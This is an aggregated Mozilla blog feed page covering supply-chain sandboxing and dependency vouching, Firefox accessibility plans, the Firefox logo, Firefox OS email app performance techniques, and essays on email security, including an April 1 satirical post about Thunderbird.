Techniques like this point the way to a scalable technical approach for protecting yourself from third party components: each component is isolated in its own sandbox and comes with a list of the capabilities that it needs (often called a manifest) with the compiler enforcing that it has no other capabilities (this is not too dissimilar from — but much more granular than — the permissions that mobile applications request). This makes the problem of including a new component much simpler because you can just look at the capabilities it requests, without needing verify that the code itself is behaving correctly.
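As a sketch of the idea (the format and field names below are hypothetical, not taken from RLBox or any shipping nanoprocess system), a component’s capability manifest and the embedder’s check against it might look like:

    // Hypothetical capability manifest for a sandboxed image-decoding component.
    const manifest = {
      component: "image-decoder",
      capabilities: {
        memory: { maxBytes: 16 * 1024 * 1024 }, // heap ceiling inside the sandbox
        files: [],          // no filesystem access
        network: [],        // no network access
        hostCalls: ["log"], // host functions it may invoke
      },
    };

    // Reviewing the component now means reviewing this list, not every line
    // of its code; the compiler/runtime enforces that nothing else is reachable.
    function approve(manifest, allowedHostCalls) {
      const caps = manifest.capabilities;
      return caps.files.length === 0 &&
             caps.network.length === 0 &&
             caps.hostCalls.every((call) => allowedHostCalls.has(call));
    }

    console.log(approve(manifest, new Set(["log"]))); // true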

Making Auditing Easier

While powerful, sandboxing itself — whether of the traditional process or WebAssembly variety — isn’t enough, for two reasons. First, the APIs that we have to work with aren’t sufficiently fine-grained. Consider the case of a component which is designed to let you open and process files on the disk; this necessarily needs to be able to open files, but what stops it from reading your Bitcoins instead of the files that the programmer wanted it to read? It might be possible to create a capability list that includes just reading certain files, but that’s not the API the operating system gives you, so now we need to invent something. There are a lot of cases like this, so things get complicated.

The second reason is that some components are critical because they perform critical functions. For instance, no matter how much you sandbox OpenSSL, you still have to worry about the fact that it’s handling your sensitive data, and so if compromised it might leak that. Fortunately, this class of critical components is smaller, but it’s non-zero.

This isn’t to say that sandboxing isn’t useful, merely that it’s insufficient. What we need is multiple layers of protection[5], with the first layer being procedural mechanisms to defend against code being compromised and the second layer being fine-grained sandboxing to contain the impact of compromise. As noted earlier, it seems problematic to put the burden of better processes on the developer of the component, especially when there are a large number of dependent projects, many of them very well funded.

Something we have been looking at internally at Mozilla is a way for those projects to tag the dependencies they use and depend on. The way that this would work is that each project would then be tagged with a set of other projects which used it (e.g., “Firefox uses this crate”). Then when you are considering using a component you could look to see who else uses it, which gives you some measure of confidence. Of course, you don’t know what sort of auditing those organizations do, but if you know that Project X is very security conscious and they use component Y, that should give you some level of confidence. This is really just automating something that already happens informally: people judge components by who else uses them. There are some obvious extensions here, for instance labelling specific versions, having indications of what kind of auditing the depending project did, allowing people to configure their build systems to automatically trust projects vouched for by some set of other projects and refuse to include unvouched projects, or maintaining a database of insecure versions (this is something the Brewer et al. proposal suggests too). The advantage of this kind of approach is that it puts the burden on the people benefitting from a project, rather than having some widely used project suddenly subject to a whole pile of new requirements which it may not be interested in meeting. This work is still in the exploratory stages, so reach out to me if you’re interested.
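A minimal sketch of what such a vouching record and the corresponding build-time check might look like (the format is entirely hypothetical, since the work is still exploratory):

    // Hypothetical record of which projects vouch for a package version.
    const record = {
      package: "example-stream-utils",
      version: "4.2.1",
      usedBy: [
        { project: "Firefox", audit: "full-review", since: "2020-11" },
        { project: "ProjectX", audit: "spot-check", since: "2021-01" },
      ],
    };

    // A build system configured to trust a set of vouching projects could
    // refuse to include dependencies that none of them use.
    function isVouched(record, trustedProjects) {
      return record.usedBy.some((entry) => trustedProjects.has(entry.project));
    }

    console.log(isVouched(record, new Set(["Firefox"]))); // true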

Obviously, this only works if people actually do some kind of due diligence prior to depending on a component. Here at Mozilla, we do that to some extent, though it’s not really practical to review every line of code in a giant package like WebRTC. There is some hope here as well: because modern languages such as Rust or Go are memory safe, it’s much easier to convince yourself that certain behaviors are impossible — even if the program has a defect — which makes it easier to audit.[6] Here too it’s possible to have clear manifests that describe what capabilities the program needs and verify (after some work) that those are accurate.

Summary

As I said at the beginning, Brewer et al. are definitely right to be worried about this kind of attack. It’s very convenient to be able to build on other people’s work, but the difficulty of ascertaining the quality of that work is an enormous problem[7]. Fortunately, we’re seeing a whole series of technological advancements that point the way to a solution without having to go back to the bad old days of writing everything yourself.

  1. Supply chain attacks can be mounted via a number of other mechanisms, but in this post, we are going to focus on this threat vector. ↩︎
  2. Where “critical” is defined by a somewhat complicated formula based roughly on the age of the project, how actively maintained it seems to be, how many other projects seem to use it, etc. It’s actually not clear to me that this metric is that good a predictor of criticality; it seems mostly to have the advantage that it’s possible to evaluate purely by looking at the code repository, but presumably one could develop a metric that would be better. ↩︎
  3. Experience with TLS Extended Validation certificates, which attempt to verify company identity, suggests that this level of identity is straightforward to fake. ↩︎
  4. Allan Schiffman used to call this phenomenon a “distributed single point of failure”. ↩︎
  5. The technical term here is defense in depth. ↩︎
  6. Even better are verifiable systems such as the HaCl* cryptographic library that Firefox depends on. HaCl* comes with a machine-checkable proof of correctness, which significantly reduces the need to audit all the code. Right now it’s only practical to do this kind of verification for relatively small programs, in large part because describing the specification that you are proving the program conforms to is hard, but the technology is rapidly getting better. ↩︎
  7. This is true even for basic quality reasons. Which of the two thousand ORMs for node is the best one to use? ↩︎

The post Notes on Addressing Supply Chain Vulnerabilities appeared first on The Mozilla Blog.

Categories: Mozilla-nl planet

Mozilla Accessibility: 2021 Firefox Accessibility Roadmap Update

Mozilla planet - Sat, 27/02/2021 - 00:03

We’ve spent the last couple of months finalizing our plans for 2021 and we’re ready to share them. What follows is a copy of the Firefox Accessibility Roadmap taken from the Mozilla Accessibility wiki.

Mozilla’s mission is to ensure the Internet is a global public resource, open and accessible to all. An Internet that truly puts people first, where individuals can shape their own experience and are empowered, safe and independent.

People with disabilities can experience huge benefits from technology but can also find it frustrating or worse, downright unusable. Mozilla’s Firefox accessibility team is committed to delivering products and services that are not just usable for people with disabilities, but a delight to use.

The Firefox accessibility (a11y) team will be spending much of 2021 re-building major pieces of our accessibility engine, the part of Firefox that powers screen readers and other assistive technologies.

While the current Firefox a11y engine has served us well for many years, new directions in browser architectures and operating systems, coupled with the increasing complexity of the modern web, mean that some of Firefox’s venerable a11y engine needs a rebuild.

Browsers, including Firefox, once simple single-process applications, have become complex multi-process systems that have to move lots of data between processes, which can cause performance slowdowns. In order to ensure the best performance and stability, and to enable support for a growing, wider variety of accessibility tools in the future (such as Windows Narrator, Speech Recognition and Text Cursor Indicator), Firefox’s accessibility engine needs to be more robust and versatile. And where ATs used to spend significant resources ensuring a great experience across browsers, the dominance of one particular browser means fewer resources being committed to ensuring that ATs work well with Firefox. This changing landscape means that Firefox too must evolve significantly, and that’s what we’re going to be doing in 2021.

The most important part of this rebuild of the Firefox accessibility engine is what we’re calling “cache the world”. Today, when an accessibility client wants to access web content, Firefox often has to send a request from its UI process to the web content process. Only a small amount of information is maintained in the UI process for faster response. Aside from the overhead of these requests, this can cause significant responsiveness problems, particularly if an accessibility client accesses many elements in the accessibility tree. The architecture we’re implementing this year will ameliorate these problems by sending the entire accessibility tree from the web content process to the UI process and keeping it up to date, ensuring that accessibility clients have the fastest possible response to their requests regardless of their complexity.

So that’s the biggest lift we’re planning for 2021 but that’s not all we’ll be doing. Firefox is always adding new features and adjusting existing features and the accessibility team will be spending significant effort ensuring that all of the Firefox changes are accessible. And we know we’re not perfect today so we’ll also be working through our backlog of defects, prioritizing and fixing the issues that cause the most severe problems for users with disabilities.

Firefox has a long history of providing great experiences for disabled people. To continue that legacy, we’re spending most of our resources this year on rebuilding core pieces of technology supporting those experiences. That means we won’t have the resources to tackle some issues we’d like to, but another piece of Firefox’s long history is that, through open source and open participation, you can help. This year, we can especially use your help identifying any new issues that take away from your experience as a disabled Firefox user, fixing high priority bugs that affect large numbers of disabled Firefox users, and spreading the word about the areas where Firefox excels as a browser for disabled users. Together, we can make 2021 a great year for Firefox accessibility.

The post 2021 Firefox Accessibility Roadmap Update appeared first on Mozilla Accessibility.

Categories: Mozilla-nl planet

Hacks.Mozilla.Org: Here’s what’s happening with the Firefox Nightly logo

Mozilla planet - Fri, 26/02/2021 - 20:43
Fox Gate

The internet was set on fire (pun intended) this week, by what I’m calling ‘fox gate’, and chances are you might have seen a meme or two about the Firefox logo. Many people were pulling up for a battle royale because they thought we had scrubbed fox imagery from our browser.

This is definitely not happening.

The logo causing all the stir is one we created a while ago with input from our users. Back in 2019, we updated the Firefox browser logo and added the parent brand logo. 

What we learned throughout this is that many of our users aren’t actually using the browser, because then they’d know (no shade) the beloved fox icon is alive and well in Firefox on your desktop.

Shameless plug – you can download the browser here

Firefox logo OSX Dock

You can read more about how all this spiralled in the mini-case study on how the ‘fox gate’ misinformation spread online here.

screenshot of tweet with firefox logos, including parent logo

Long story short, the fox is here to stay and for our Firefox Nightly users out there, we’re bringing back a very special version of an older logo, as a treat.

Firefox Browser Nightly

Our commitment to privacy and a safe and open web remains the same. We hope you enjoy the nightly version of the logo and take some time to read up on spotting misinformation and fake news.

 

The post Here’s what’s happening with the Firefox Nightly logo appeared first on Mozilla Hacks - the Web developer blog.

Categories: Mozilla-nl planet

The Firefox Frontier: Remain Calm: the fox is still in the Firefox logo

Mozilla planet - Fri, 26/02/2021 - 19:00

If you’ve been on the internet this week, chances are you might have seen a meme or two about the Firefox logo. And listen, that’s great news for us. Sure, … Read more

The post Remain Calm: the fox is still in the Firefox logo appeared first on The Firefox Frontier.

Categories: Mozilla-nl planet

Patrick Cloke: django-querysetsequence 0.14 released!

Mozilla planet - Fri, 26/02/2021 - 18:31

django-querysetsequence 0.14 has been released with support for Django 3.2 (and Python 3.9). django-querysetsequence is a Django package for treating multiple QuerySet instances as a single QuerySet; this can be useful for treating similar models as a single model. The QuerySetSequence class supports much of the API …

Categories: Mozilla-nl planet

Ludovic Hirlimann: My geeking plans for this summer

Thunderbird - Thu, 07/05/2015 - 10:39

During July I’ll be visiting family in Mongolia, but I also have a few very geeky things I want to do.

The first thing I want to do is plug in the RIPE Atlas probes I have. They’re little devices that look like this:

Hello @ripe #Atlas !

They enable anybody with a RIPE Atlas or RIPE account to make measurements for DNS queries and other things. This helps make the global internet better. I have three of these probes I’d like to install. It’s good because last time I checked, Mongolia didn’t have any active probes. These probes will also help the Internet become better in Mongolia. I’ll need to buy some network cables before leaving because finding these in Mongolia is going to be challenging. More on Atlas at https://atlas.ripe.net/.

The second thing I intend to do is map Mongolia a bit better through two projects. The first is related to Mozilla and maps GPS coordinates with Wi-Fi access points. Only a small part of the capital Ulaanbaatar is covered, as per https://location.services.mozilla.com/map#11/47.8740/106.9485. I want this to cover much more, because having an open data source for this is important for the future. As mapping is my new thing, I’ll probably edit OpenStreetMap in order to make the urban parts of Mongolia that I’ll visit much more usable on all the services that use OSM as a source of truth. There is already a project to map the capital city at http://hotosm.org/projects/mongolia_mapping_ulaanbaatar, but I believe OSM can serve more than just 50% of Mongolia’s population.

I got inspired to write this post by my son this morning; look what he is doing at 17 months:

Geeking on a Sun keyboard at 17 months
Categorieën: Mozilla-nl planet

Andrew Sutherland: Talk Script: Firefox OS Email Performance Strategies

Thunderbird - do, 30/04/2015 - 22:11

Last week I gave a talk at the Philly Tech Week 2015 Dev Day organized by the delightful people at technical.ly on some of the tricks/strategies we use in the Firefox OS Gaia Email app.  Note that the credit for implementing most of these techniques goes to the owner of the Email app’s front-end, James Burke.  Also, a special shout-out to Vivien for the initial DOM Worker patches for the email app.

I tried to avoid having slides that both I would be reading aloud as the audience read silently, so instead of slides to share, I have the talk script.  Well, I also have the slides here, but there’s not much to them.  The headings below are the content of the slides, except for the one time I inline some code.  Note that the live presentation must have differed slightly, because I’m sure I’m much more witty and clever in person than this script would make it seem…

Cover Slide: Who!

Hi, my name is Andrew Sutherland.  I work at Mozilla on the Firefox OS Email Application.  I’m here to share some strategies we used to make our HTML5 app Seem faster and sometimes actually Be faster.

What’s A Firefox OS (Screenshot Slide)

But first: What is a Firefox OS?  It’s a multiprocess Firefox Gecko engine on an Android Linux kernel where all the apps, including the system UI, are implemented using HTML5, CSS, and JavaScript.  All the apps use some combination of standard web APIs and APIs that we hope to standardize in some form.

Firefox OS homescreen screenshot Firefox OS clock app screenshot Firefox OS email app screenshot

Here are some screenshots.  We’ve got the default home screen app, the clock app, and of course, the email app.

It’s an entirely client-side offline email application, supporting IMAP4, POP3, and ActiveSync.  The goal, like all Firefox OS apps shipped with the phone, is to give native apps on other platforms a run for their money.

And that begins with starting up fast.

Fast Startup: The Problems

But that’s frequently easier said than done.  Slow-loading websites are still very much a thing.

The good news for the email application is that a slow network isn’t one of its problems.  It’s pre-loaded on the phone.  And even if it wasn’t, because of the security implications of the TCP Web API and the difficulty of explaining this risk to users in a way they won’t just click through, any TCP-using app needs to be a cryptographically signed zip file approved by a marketplace.  So we do load directly from flash.

However, it’s not like flash on cellphones is equivalent to an infinitely fast, zero-latency network connection.  And even if it was, in a naive app you’d still try and load all of your HTML, CSS, and JavaScript at the same time because the HTML file would reference them all.  And that adds up.

It adds up in the form of event loop activity and competition with other threads and processes.  With the exception of Promises which get their own micro-task queue fast-lane, the web execution model is the same as all other UI event loops; events get scheduled and then executed in the same order they are scheduled.  Loading data from an asynchronous API like IndexedDB means that your read result gets in line behind everything else that’s scheduled.  And in the case of the bulk of shipped Firefox OS devices, we only have a single processor core so the thread and process contention do come into play.

So we try not to be naive.

Seeming Fast at Startup: The HTML Cache

If we’re going to optimize startup, it’s good to start with what the user sees.  Once an account exists for the email app, at startup we display the default account’s inbox folder.

What is the least amount of work that we can do to show that?  Cache a screenshot of the Inbox.  The problem with that, of course, is that a static screenshot is indistinguishable from an unresponsive application.

So we did the next best thing: we cache the actual HTML we display.  At startup we load a minimal HTML file, our concatenated CSS, and just enough JavaScript to figure out if we should use the HTML cache and then actually use it if appropriate.  It’s not always appropriate, like if our application is being triggered to display a compose UI or from a new mail notification that wants to show a specific message or a different folder.  But this is a decision we can make synchronously so it doesn’t slow us down.

Local Storage: Okay in small doses

We implement this by storing the HTML in localStorage.

Important Disclaimer!  LocalStorage is a bad API.  It’s a bad API because it’s synchronous.  You can read any value stored in it at any time, without waiting for a callback.  Which means if the data is not in memory the browser needs to block its event loop or spin a nested event loop until the data has been read from disk.  Browsers avoid this now by trying to preload the Entire contents of local storage for your origin into memory as soon as they know your page is being loaded.  And then they keep that information, ALL of it, in memory until your page is gone.

So if you store a megabyte of data in local storage, that’s a megabyte of data that needs to be loaded in its entirety before you can use any of it, and that hangs around in scarce phone memory.

To really make the point: do not use local storage, at least not directly.  Use a library like localForage that will use IndexedDB when available, falling back to WebSQLDatabase and local storage, in that order.
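For illustration, here is roughly what that looks like with localForage’s promise flavor (a minimal sketch; the key and value here are made up):

var draft = { subject: "hello", body: "..." };
// Same get/set shape as localStorage, but asynchronous and IndexedDB-backed.
localforage.setItem("draft", draft).then(function() {
  return localforage.getItem("draft");
}).then(function(value) {
  console.log("round-tripped draft:", value.subject);
});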

Now, having sufficiently warned you of the terrible evils of local storage, I can say with a sorta-clear conscience… there are upsides in this very specific case.

The synchronous nature of the API means that once we get our turn in the event loop we can act immediately.  There’s no waiting around for an IndexedDB read result to get its turn on the event loop.
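A minimal sketch of that startup path, assuming a made-up cache key and container id (the real app’s names differ):

function applyHtmlCache() {
  // Synchronous read: we can act the moment we get our turn on the event loop.
  var cachedHtml = localStorage.getItem("html-cache/default-inbox");
  // Only a plain launch should use the cache; compose or notification launches
  // need different UI, and that decision can also be made synchronously.
  var isPlainLaunch = !window.location.hash;
  if (cachedHtml && isPlainLaunch) {
    document.getElementById("cards").innerHTML = cachedHtml;
    return true;
  }
  return false;
}

// Once the real inbox has rendered, refresh the cache for the next startup.
function updateHtmlCache(cardsNode) {
  localStorage.setItem("html-cache/default-inbox", cardsNode.innerHTML);
}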

This matters because although the concept of loading is simple from a User Experience perspective, there’s no standard to back it up right now.  Firefox OS’s UX desires are very straightforward.  When you tap on an app, we zoom it in.  Until the app is loaded we display the app’s icon in the center of the screen.  Unfortunately the standards are still assuming that the content is right there in the HTML.  This works well for document-based web pages or server-powered web apps where the contents of the page are baked in.  It works less well for client-only web apps where the content lives in a database and has to be dynamically retrieved.

The two events that exist are:

“DOMContentLoaded” fires when the document has been fully parsed and all scripts not tagged as “async” have run.  If there were stylesheets referenced prior to the script tags, the script tags will wait for the stylesheet loads.

“load” fires when the document has been fully loaded; stylesheets, images, everything.

But none of these have anything to do with the content in the page saying it’s actually done.  This matters because these standards also say nothing about IndexedDB reads or the like.  We tried to create a standards consensus around this, but it’s not there yet.  So Firefox OS just uses the “load” event to decide an app or page has finished loading and it can stop showing your app icon.  This largely avoids the dreaded “flash of unstyled content” problem, but it also means that your webpage or app needs to deal with this period of time by displaying a loading UI or just accepting a potentially awkward transient UI state.

(Trivial HTML slide)

<link rel="stylesheet" ...>
<script ...></script>
DOMContentLoaded!

This is the important summary of our index.html.

We reference our stylesheet first.  It includes all of our styles.  We never dynamically load stylesheets because that compels a style recalculation for all nodes and potentially a reflow.  We would have to have an awful lot of style declarations before considering that.

Then we have our single script file.  Because the stylesheet precedes the script, our script will not execute until the stylesheet has been loaded.  Then our script runs and we synchronously insert our HTML from local storage.  Then DOMContentLoaded can fire.  At this point the layout engine has enough information to perform a style recalculation and determine what CSS-referenced image resources need to be loaded for buttons and icons, then those load, and then we’re good to be displayed as the “load” event can fire.

After that, we’re displaying an interactive-ish HTML document.  You can scroll, you can press on buttons and the :active state will apply.  So things seem real.

Being Fast: Lazy Loading and Optimized Layers

But now we need to try and get some logic in place as quickly as possible that will actually cash the checks that real-looking HTML UI is writing.  And the key to that is only loading what you need when you need it, and trying to get it to load as quickly as possible.

There are many module loading and build optimizing tools out there, and most frameworks have a preferred or required way of handling this.  We used the RequireJS family of Asynchronous Module Definition loaders, specifically the alameda loader and the r-dot-js optimizer.

One of the niceties of the loader plugin model is that we are able to express resource dependencies as well as code dependencies.

RequireJS Loader Plugins

var fooModule = require('./foo');
var htmlString = require('text!./foo.html');
var localizedDomNode = require('tmpl!./foo.html');

The standard CommonJS loader semantics used by node.js and io.js are what you see on the first line here.  Load the module, return its exports.

But RequireJS loader plugins also allow us to do things like the second line where the exclamation point indicates that the load should occur using a loader plugin, which is itself a module that conforms to the loader plugin contract.  In this case it’s saying load the file foo.html as raw text and return it as a string.

But, wait, there’s more!  Loader plugins can do more than that.  The third example uses a loader that loads the HTML file using the ‘text’ plugin under the hood, creates an HTML document fragment, and pre-localizes it using our localization library.  And this works un-optimized in a browser, no compilation step needed, but it can also be optimized.
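To make the contract concrete, here is a toy version of such a ‘tmpl!’ plugin; the module names and the localization helper are illustrative, not the email app’s actual code:

define(["text"], function(text) {
  return {
    // The AMD loader plugin contract: a module exposing load(name, req, onload, config).
    load: function(name, req, onload, config) {
      text.load(name, req, function(htmlString) {
        // Turn the raw text into a fragment and localize it before handing it back.
        var frag = document.createRange().createContextualFragment(htmlString);
        localizeFragment(frag); // hypothetical localization helper
        onload(frag);
      }, config);
    }
  };
});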

So when our optimizer runs, it bundles up the core modules we use, plus, the modules for our “message list” card that displays the inbox.  And the message list card loads its HTML snippets using the template loader plugin.  The r-dot-js optimizer then locates these dependencies and the loader plugins also have optimizer logic that results in the HTML strings being inlined in the resulting optimized file.  So there’s just one single javascript file to load with no extra HTML file dependencies or other loads.

We then also run the optimizer against our other important cards like the “compose” card and the “message reader” card.  We don’t do this for all cards because it can be hard to carve up the module dependency graph for optimization without starting to run into cases of overlap where many optimized files redundantly include files loaded by other optimized files.
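For flavor, a hypothetical r.js build profile for one such card might look like this (paths and module names are invented, and the real build involves more configuration than shown):

({
  baseUrl: "js",
  // The card's entry module; its "tmpl!" HTML dependencies get inlined
  // into the output by the loader plugins' optimizer logic.
  name: "cards/message_list",
  // Keep modules that already live in the core bundle out of this layer.
  exclude: ["main"],
  out: "js/cards/message_list-built.js"
})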

Plus, we have another trick up our sleeve:

Seeming Fast: Preloading

Preloading.  Our cards optionally know the other cards they can load.  So once we display a card, we can kick off a preload of the cards that might potentially be displayed.  For example, the message list card can trigger the compose card and the message reader card, so we can trigger a preload of both of those.
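A sketch of that hook (the card object and names are invented for illustration):

// After the message list card is shown, warm up the cards it can trigger.
messageListCard.onDisplayed = function() {
  require(["cards/compose", "cards/message_reader"], function() {
    // Nothing to do here; the modules (and their inlined templates)
    // are now sitting in the loader's cache for instant use later.
  });
};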

But we don’t go overboard with preloading in the frontend because we still haven’t actually loaded the back-end that actually does all the emaily email stuff.  The back-end is also chopped up into optimized layers along account type lines and online/offline needs, but the main optimized JS file still weighs in at something like 17 thousand lines of code with newlines retained.

So once our UI logic is loaded, it’s time to kick-off loading the back-end.  And in order to avoid impacting the responsiveness of the UI both while it loads and when we’re doing steady-state processing, we run it in a DOM Worker.

Being Responsive: Workers and SharedWorkers

DOM Workers are background JS threads that lack access to the page’s DOM, communicating with their owning page via message passing with postMessage.  Normal workers are owned by a single page.  SharedWorkers can be accessed via multiple pages from the same document origin.
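The shape of that split, sketched (the file name and message format are invented):

// UI side: spawn the back-end off the main thread and talk via messages.
var backend = new Worker("js/mail-backend.js");
backend.onmessage = function(evt) {
  // React to results without ever having blocked on back-end work.
  console.log("backend:", evt.data.cmd);
};
backend.postMessage({ cmd: "syncFolder", folder: "INBOX" });

// Inside js/mail-backend.js:
// onmessage = function(evt) {
//   if (evt.data.cmd === "syncFolder") {
//     // ... heavy protocol and database work happens here ...
//     postMessage({ cmd: "syncDone", folder: evt.data.folder });
//   }
// };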

By doing this, we stay out of the way of the main thread.  This is getting less important as browser engines support Asynchronous Panning & Zooming or “APZ” with hardware-accelerated composition, tile-based rendering, and all that good stuff.  (Some might even call it magic.)

When Firefox OS started, we didn’t have APZ, so any main-thread logic had the serious potential to result in janky scrolling and the impossibility of rendering at 60 frames per second.  It’s a lot easier to get 60 frames-per-second now, but even asynchronous pan and zoom potentially has to wait on dispatching an event to the main thread to figure out if the user’s tap is going to be consumed by app logic and preventDefault called on it.  APZ does this because it needs to know whether it should start scrolling or not.

And speaking of 60 frames-per-second…

Being Fast: Virtual List Widgets

…the heart of a mail application is the message list.  The expected UX is to be able to fling your way through the entire list of what the email app knows about and see the messages there, just like you would on a native app.

This is admittedly one of the areas where native apps have it easier.  There are usually list widgets that explicitly have a contract that says they request data on an as-needed basis.  They potentially even include data bindings so you can just point them at a data-store.

But HTML doesn’t yet have a concept of instantiate-on-demand for the DOM, although it’s being discussed by Firefox layout engine developers.  For app purposes, the DOM is a scene graph.  An extremely capable scene graph that can handle huge documents, but there are footguns and it’s arguably better to err on the side of fewer DOM nodes.

So what the email app does is we create a scroll-region div and explicitly size it based on the number of messages in the mail folder we’re displaying.  We create and render enough message summary nodes to cover the current screen, 3 screens worth of messages in the direction we’re scrolling, and then we also retain up to 3 screens worth in the direction we scrolled from.  We also pre-fetch 2 more screens worth of messages from the database.  These constants were arrived at experimentally on prototype devices.
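In sketch form, with placeholder constants (the real numbers are the experimentally derived ones above):

var ITEM_HEIGHT = 60;    // px per message summary node (placeholder)
var BUFFER_SCREENS = 3;  // rendered screens kept in each direction

// Size the scroll region so the scrollbar is honest even though most
// message nodes don't exist in the DOM.
function sizeScrollRegion(scrollRegion, messageCount) {
  scrollRegion.style.height = (messageCount * ITEM_HEIGHT) + "px";
}

// Which message indices need rendered nodes for this scroll position?
function neededRange(scrollTop, viewportHeight, messageCount) {
  var buffer = BUFFER_SCREENS * viewportHeight;
  var first = Math.max(0, Math.floor((scrollTop - buffer) / ITEM_HEIGHT));
  var last = Math.min(messageCount - 1,
                      Math.ceil((scrollTop + viewportHeight + buffer) / ITEM_HEIGHT));
  return { first: first, last: last };
}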

We listen to “scroll” events and issue database requests and move DOM nodes around and update them as the user scrolls.  For any potentially jarring or expensive transitions such as coordinate space changes from new messages being added above the current scroll position, we wait for scrolling to stop.

Nodes are absolutely positioned within the scroll area using their ‘top’ style but translation transforms also work.  We remove nodes from the DOM, then update their position and their state before re-appending them.  We do this because the browser APZ logic tries to be clever and figure out how to create an efficient series of layers so that it can pre-paint as much of the DOM as possible in graphic buffers, AKA layers, that can be efficiently composited by the GPU.  Its goal is that when the user is scrolling, or something is being animated, that it can just move the layers around the screen or adjust their opacity or other transforms without having to ask the layout engine to re-render portions of the DOM.

When our message elements are added to the DOM with an already-initialized absolute position, the APZ logic lumps them together as something it can paint in a single layer along with the other elements in the scrolling region.  But if we start moving them around while they’re still in the DOM, the layerization logic decides that they might want to independently move around more in the future and so each message item ends up in its own layer.  This slows things down.  But by removing them and re-adding them it sees them as new with static positions and decides that it can lump them all together in a single layer.  Really, we could just create new DOM nodes, but we produce slightly less garbage this way and in the event there’s a bug, it’s nicer to mess up with 30 DOM nodes displayed incorrectly rather than 3 million.
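The remove-then-re-append dance, in sketch form (bindMessage is a hypothetical helper that fills a node with a message’s data, and ITEM_HEIGHT is the placeholder constant from the sketch above):

function repositionNode(scrollRegion, node, index) {
  node.remove();                                  // leave the layer tree
  node.style.top = (index * ITEM_HEIGHT) + "px";  // move while detached
  bindMessage(node, index);                       // update contents (hypothetical)
  scrollRegion.appendChild(node);                 // re-enter as "static" content
}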

But as neat as the layerization stuff is to know about on its own, I really mention it to underscore 2 suggestions:

1. Use a library when possible.  Getting on and staying on APZ fast-paths is not trivial, especially across browser engines.  So it’s a very good idea to use a library rather than rolling your own.

2. Use developer tools.  APZ is tricky to reason about and even the developers who write the Async pan & zoom logic can be surprised by what happens in complex real-world situations.  And there ARE developer tools available that help you avoid needing to reason about this.  Firefox OS has easy on-device developer tools that can help diagnose what’s going on or at least help tell you whether you’re making things faster or slower:

– it’s got a frames-per-second overlay; you do need to scroll like mad to get the system to want to render 60 frames-per-second, but it makes it clear what the net result is

– it has paint flashing that overlays random colors every time it paints the DOM into a layer.  If the screen is flashing like a discotheque or has a lot of smeared rainbows, you know something’s wrong because the APZ logic is not able to just reuse its layers.

– devtools can enable drawing cool colored borders around the layers APZ has created so you can see if layerization is doing something crazy

There are also fancier and more complicated tools in Firefox and other browsers like Google Chrome to let you see what got painted, what the layer tree looks like, et cetera.

And that’s my spiel.

Links

The source code to Gaia can be found at https://github.com/mozilla-b2g/gaia

The email app in particular can be found at https://github.com/mozilla-b2g/gaia/tree/master/apps/email

(I also asked for questions here.)

Categorieën: Mozilla-nl planet

Joshua Cranmer: Breaking news

Thunderbird - wo, 01/04/2015 - 09:00
It was brought to my attention recently by reputable sources that the recent announcement of increased usage in recent years produced an internal firestorm within Mozilla. Key figures raised alarm that some of the tech press had interpreted the blog post as a sign that Thunderbird was not, in fact, dead. As a result, they asked Thunderbird community members to make corrections to emphasize that Mozilla was trying to kill Thunderbird.

The primary fear, it seems, is that knowledge that the largest open-source email client was still receiving regular updates would impel its userbase to agitate for increased funding and maintenance of the client to help forestall potential threats to the open nature of email as well as to innovate in the space of providing usable and private communication channels. Such funding, however, would be an unaffordable luxury and would only distract Mozilla from its central goal of building developer productivity tooling. Persistent rumors that Mozilla would be willing to fund Thunderbird were it renamed Firefox Email were finally addressed with the comment, "such a renaming would violate our current policy that all projects be named Persona."

Categorieën: Mozilla-nl planet

Joshua Cranmer: Why email is hard, part 8: why email security failed

Thunderbird - di, 13/01/2015 - 05:38
This post is part 8 of an intermittent series exploring the difficulties of writing an email client. Part 1 describes a brief history of the infrastructure. Part 2 discusses internationalization. Part 3 discusses MIME. Part 4 discusses email addresses. Part 5 discusses the more general problem of email headers. Part 6 discusses how email security works in practice. Part 7 discusses the problem of trust. This part discusses why email security has largely failed.

At the end of the last part in this series, I posed the question, "Which email security protocol is most popular?" The answer to the question is actually neither S/MIME nor PGP, but a third protocol, DKIM. I haven't brought up DKIM until now because DKIM doesn't try to secure email in the same vein as S/MIME or PGP, but I still consider it relevant to discussing email security.

Unquestionably, DKIM is the only security protocol for email that can be considered successful. There are perhaps 4 billion active email addresses [1]. Of these, about 1-2 billion use DKIM. In contrast, S/MIME can count a few million users, and PGP at best a few hundred thousand. No other security protocols have really caught on past these three. Why did DKIM succeed where the others failed?

DKIM's success stems from its relatively narrow focus. It is nothing more than a cryptographic signature of the message body and a smattering of headers, and is itself stuck in the DKIM-Signature header. It is meant to be applied to messages only on outgoing servers and read and processed at the recipient mail server—it completely bypasses clients. That it bypasses clients allows it to solve the problem of key discovery and key management very easily (public keys are stored in DNS, which is already a key part of mail delivery), and its role in spam filtering is strong motivation to get it implemented quickly (it is 7 years old as of this writing). It's also simple: this one paragraph description is basically all you need to know [2].

The failure of S/MIME and PGP to see large deployment is certainly a large topic of discussion on myriads of cryptography enthusiast mailing lists, which often like to partake in propositions of new end-to-end encryption of email paradigms, such as the recent DIME proposal. Quite frankly, all of these solutions suffer broadly from at least the same 5 fundamental weaknesses, and I see it as unlikely that a protocol will come about that can fix these weaknesses well enough to become successful.

The first weakness, and one I've harped about many times already, is UI. Most email security UI is abysmal and generally at best usable only by enthusiasts. At least some of this is endemic to security: while it may seem obvious how to convey what an email signature or an encrypted email signifies, how do you convey the distinctions between sign-and-encrypt, encrypt-and-sign, or an S/MIME triple wrap? The Web of Trust model used by PGP (and many other proposals) is even worse, in that it inherently requires users to do other actions out-of-band of email to work properly.

Trust is the second weakness. Consider that, for all intents and purposes, the email address is the unique identifier on the Internet. By extension, that implies that a lot of services are ultimately predicated on the notion that the ability to receive and respond to an email is a sufficient means to identify an individual. However, the entire purpose of secure email, or at least of end-to-end encryption, is subtly based on the fact that other people in fact have access to your mailbox, thus destroying the most natural ways to build trust models on the Internet. The quest for anonymity or privacy also renders untenable many other plausible ways to establish trust (e.g., phone verification or government-issued ID cards).

Key discovery is another weakness, although it's arguably the easiest one to solve. If you try to keep discovery independent of trust, the problem of key discovery is merely picking a protocol to publish and another one to find keys. Some of these already exist: PGP key servers, for example, or using DANE to publish S/MIME or PGP keys.

